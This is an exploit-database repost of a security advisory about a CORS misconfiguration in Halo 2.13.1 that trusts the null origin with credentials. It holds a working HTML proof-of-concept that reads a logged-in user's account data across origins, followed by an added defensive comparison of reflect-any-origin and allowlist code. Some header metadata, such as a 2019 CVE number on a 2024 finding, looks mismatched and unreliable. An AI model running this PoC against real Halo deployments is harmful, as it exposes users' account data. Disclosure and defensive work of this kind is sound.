HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted

| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-2019-7164 | CWE-201 | $15,000 | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Unknown | High | Remote | 2024-03-16 |

CPE: cpe:/a:halo:web_app:2.13.1

| CVSS | EPSS | EPSSP |
|---|---|---|
| CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H | 0.8344 | 0.9546 |


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030033

Below is a copy:

## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted
## Author: nu11secur1ty
## Date: 03/15/2024
## Vendor: https://www.halo.run/
## Software: https://github.com/halo-dev/halo
## Reference: https://portswigger.net/web-security/cors

## Description:
The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin null.
The application allows two-way interaction from the null origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe or a malicious phishing domain with a specially crafted HTML exploit.

STATUS: HIGH Vulnerability

[+]Exploit:
```HTML
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit Click here</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    // Request finished and the browser allowed this page to read the response
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("GET", "http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-", true);
  // Send the logged-in user's cookies with the cross-origin request
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</center>

</body>
</html>
```
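
The policy flaw described above, shown beside an exact-match allowlist, as an added example that is not code from the advisory or from Halo. The function names, the trusted origin and the plain header objects are constructed for illustration; `auditCors` is a check that can be run over captured response headers.

```javascript
// Hypothetical names and values throughout; none of this is Halo's code.
const TRUSTED_ORIGINS = new Set(["https://console.example.test"]); // constructed

// Weak pattern matching the finding: echo whatever Origin the browser sent,
// including the literal string "null", and allow credentials.
function reflectAnyOrigin(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Hardened pattern: exact match against an allowlist of serialized origins.
// "null" and unparsable values never match, so no CORS headers are emitted.
function allowlistOrigin(origin, trusted = TRUSTED_ORIGINS) {
  let normalized;
  try {
    normalized = new URL(origin).origin; // scheme://host[:port]
  } catch {
    return {}; // missing, "null", or malformed Origin header
  }
  if (normalized !== origin || !trusted.has(normalized)) return {};
  return {
    "Access-Control-Allow-Origin": normalized,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Audit check: given the Origin a test request carried and the response
// headers, report whether credentialed reads are granted to an untrusted origin.
function auditCors(requestOrigin, headers, trusted = TRUSTED_ORIGINS) {
  const acao = headers["Access-Control-Allow-Origin"];
  const creds = headers["Access-Control-Allow-Credentials"] === "true";
  if (!acao || !creds) return "ok";
  if (acao === "null") return "null-origin-trusted";
  if (acao === requestOrigin && !trusted.has(acao)) return "arbitrary-origin-trusted";
  return "ok";
}
```

Real header names are case-insensitive, so a production check would normalize them before lookup.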

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)

## Time spent:
00:25:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.